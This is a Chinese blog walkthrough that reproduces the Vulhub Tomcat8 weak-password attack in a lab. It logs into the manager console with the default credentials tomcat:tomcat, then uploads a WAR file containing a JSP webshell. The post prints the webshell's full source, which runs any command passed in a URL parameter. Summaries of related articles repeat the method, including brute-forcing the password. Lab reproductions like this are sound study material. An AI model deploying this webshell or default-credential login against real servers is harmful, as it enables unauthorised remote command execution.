Tomcat8 + 弱口令 && 后台getshell 漏洞复现

最新推荐文章于 2025-07-03 00:32:03 发布
原创 最新推荐文章于 2025-07-03 00:32:03 发布 · 1.9k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Tomcat8 + 弱口令 && 后台getshell 漏洞复现

本文详细介绍如何使用Vulhub搭建Tomcat环境,并演示利用Tomcat Manager应用部署漏洞上传木马文件,实现远程代码执行的过程。
一:搭建环境

1、利用vulhub搭建环境,进入相关漏洞目录下

cd /vulhub/tomcat/tomcat8

2、一键安装环境

docker-compose up -d
二:漏洞利用

1、打开http://your-ip:8080/manager/html,输入弱密码tomcat:tomcat。
2、制作木马文件,首先准备一个ma.jsp木马,压缩成ma.zip,再修改后缀名为ma.war。
ma.jsp

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句话木马</title>
    </head>

    <body>
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>

</html>

3、上传木马文件。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
上传成功。
4、访问:http://192.168.33.137:8080/ma/ma.jsp?pwd=admin&cmd=id
在这里插入图片描述
成功执行cmd命令。

Tomcat7+ 弱口令 && 后台getshell漏洞
weixin_45653478的博客
05-11 1428
Tomcat 是一个流行的开源Web应用服务器,用于部署和运行Java Web应用程序。Tomcat 7+ 版本中存在一个安全隐患,即默认的管理员密码可能较弱或者未被修改,攻击者可以利用这一漏洞登录到Tomcat的管理后台,并上传恶意的WAR包来执行任意代码。
Tomcat8弱口令&后台获取getshell复现(包括搭建环境的问题)
m0_49988054的博客
04-17 618
tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。
[Tomcat]Tomcat8+ Weak Password && Backend Getshell Vulnerability
qq_1873822的博客
03-22 1035
弱密码+getshell 访问http://node3.buuoj.cn:25141/manager/html 弱密码 tomcat tomcat 在这个后台,我们可以操作每个应用的状态……以及读取每个应用下的Session。 但是这都不是最大的安全隐患 制作war包。 war包:Java web工程,都是打成war包,进行发布,如果我们的服务器选择TOMCAT等轻量级服务器,一般就打出WAR包进行发布 准备好jsp一句话木马,在安装好JDK环境,执行:jar -cvf [war包名称].war 打包目
vulhub Tomcat8漏洞复现
weixin_51441054的博客
03-22 6493
vulhub Tomcat8漏洞复现 搭建一下Tomcat8这个漏洞的环境 查看端口发现是8080端口开放 可以看到环境已经搭建好了 尝试登录问题页面,发现需要输入密码http://...:8080/manager/html 用msf 得到弱口令 成功登入后台 此处可上传文件,尝试上传webshell 上传jsp一句话木马,打包为war格式 上传出现报错,40...
16.Tomcat弱口令 && 后台getshell漏洞
weixin_30611509的博客
11-01 453
Tomcat7+ 弱口令 &amp;&amp; 后台getshell漏洞 Tomcat版本:8.0 环境说明 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: manager(后台管理) manager-gui 拥有html页面权限 manager-status 拥有查看...
漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞
过期的秋刀鱼
11-04 2038
这些权限的究竟有什么作用,详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html。正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限。可见,用户tomcat拥有上述所有权限,密码是。即可跳到管理登陆页面。
Tomcat+弱口令&后台Getshell漏洞复现
weixin_60329395的博客
08-03 1343
漏洞影响范围:Tomcat 8.0版本、漏洞类型:弱口令、任意文件上传、漏洞成因:在tomcat8环境下,默认的后台密码为tomcat:tomcat,未修改默认密码就会造成未经授权的后台访问。后台存在war包绕过
vulhub靶场 tomcat8漏洞复现
最新发布
2401_83000550的博客
07-03 424
vulhub 靶场的tomcat8漏洞
Tomcat8 远程执行漏洞复现
weixin_60864619的博客
07-16 613
上传之后访问192.168.153.136:8080/shell/shell?通过命令zip shell.war shell.jsp将jsp木马打包成war包,打包后修改后缀为war即可;Set RHOST 192.168.153.136(你的IP);复现Vulhub/tomcat/tomcat8漏洞。上传jsp一句话木马。
apache-tomcat-8.0.46.zip
09-01
apache-tomcat-8.0.46 Linux版本 tomcat8含有AJP漏洞的版本,可以用于漏洞测试。
Tomcat弱口令扫描工具
07-18
Tomcat弱口令扫描工具,可自己写字典进行爆破。
Tomcat/8.0.43漏洞复现
RMC131的博客
09-25 3433
服务器是用的百度云个人新用户的一个月试用,漏洞环境是ubuntu+docker+Vulhub靶场。(以前没用过,docker竟然这么好使)环境搭建比较简单(换源,docker,git,build,up),没有必要写了。
Tomcat漏洞CVE-2017-12615 CVE-2020-1938 tomcat8漏洞复现分析
m0_61506558的博客
09-21 3838
tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。
TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>
thelostworld
08-25 397
操作流程(环境搭建-实践操作)在linux虚拟机上安装jdk新创建linux虚拟机通过mobaxterm连接虚拟机导入tomcat安装包与jdk安装包apache-tomcat-7.0.92.tarjdk-8u201-linux-x64.tar.gz查询环境中是否存在javayum list installed |grep java创建jdk的路径 /usr/java/mkdir /usr/jav...
Tomcat管理页面弱口令页面Getshell
谢公子的博客
05-22 7183
目录 弱口令Getshell 利用Burpsuite对tomcat账号密码进行爆破 弱口令Getshell Tomcat安装完成后会有如下页面,点击该页面的 Manager App 处会弹出输入用户名和密码的认证框。我们也可以直接访问:http://127.0.0.1:8080/manager/html 来访问该管理页面 此时,需要我们输入用户名和密码进行登录。我们可以尝试一...
vulhub之tomcat弱口令+部署war包GetShell
lionwerson的博客
04-04 702
1.拉取靶场镜像,打开靶场 2.登陆抓包进行爆破,设置一个位置,然后选择类型为custom iterator,然后在下面payload选项中选择三个位置,然后增加编码的方式,最后一定要取消勾选,在选项最下面的url编码特殊字符,否则就算爆出了弱口令也无法显示成功。 如果勾选了url编码特殊字符就会让生成的base64编码的结尾的等号被url编码,即使看到的payload正确,但是请求不正确,所以显示不成功。 密码是tomcat,用户名也是。 3.进入后台上传文件,然后getshel.
Tomcat 中间件漏洞
weixin_71053667的博客
08-06 1200
Tomcat 配置了两个Connecto,它们分别是 HTTP 和 AJP :HTTP默认端口为8080,处理http请求,而AJP默认端口8009,用于处理 AJP 协议的请求,漏洞由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件以及可以包含任意文件,如果有某上传点,上传图片马等等,即可以获取shell。在tomcat8环境下默认进入后台的密码为 tomcat/tomcat ,未修改造成未授权即可进入后台,或者管理员把密码设置成弱口令
cent 8.0 安装tomcat 9.0_tomcat反序列化漏洞(cve-2016-8735)
weixin_39604478的博客
11-25 382
原创: free雅轩 合天智汇 复现起源:近期在项目中碰到的ApacheTomcat中间件愈来愈多,于是乎。想着做一个整理。将ApacheTomcat中间件的几大较为重要的高危漏洞做一个总结整理复现。用作来巩固更新自己的知识库。在这里感谢公司Bearcat师傅和残忆师傅以及李师傅等指导和共享精神。今天我们来一起复现一下Tomcat多版本远程代码执行CVE-2016-8735。复现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值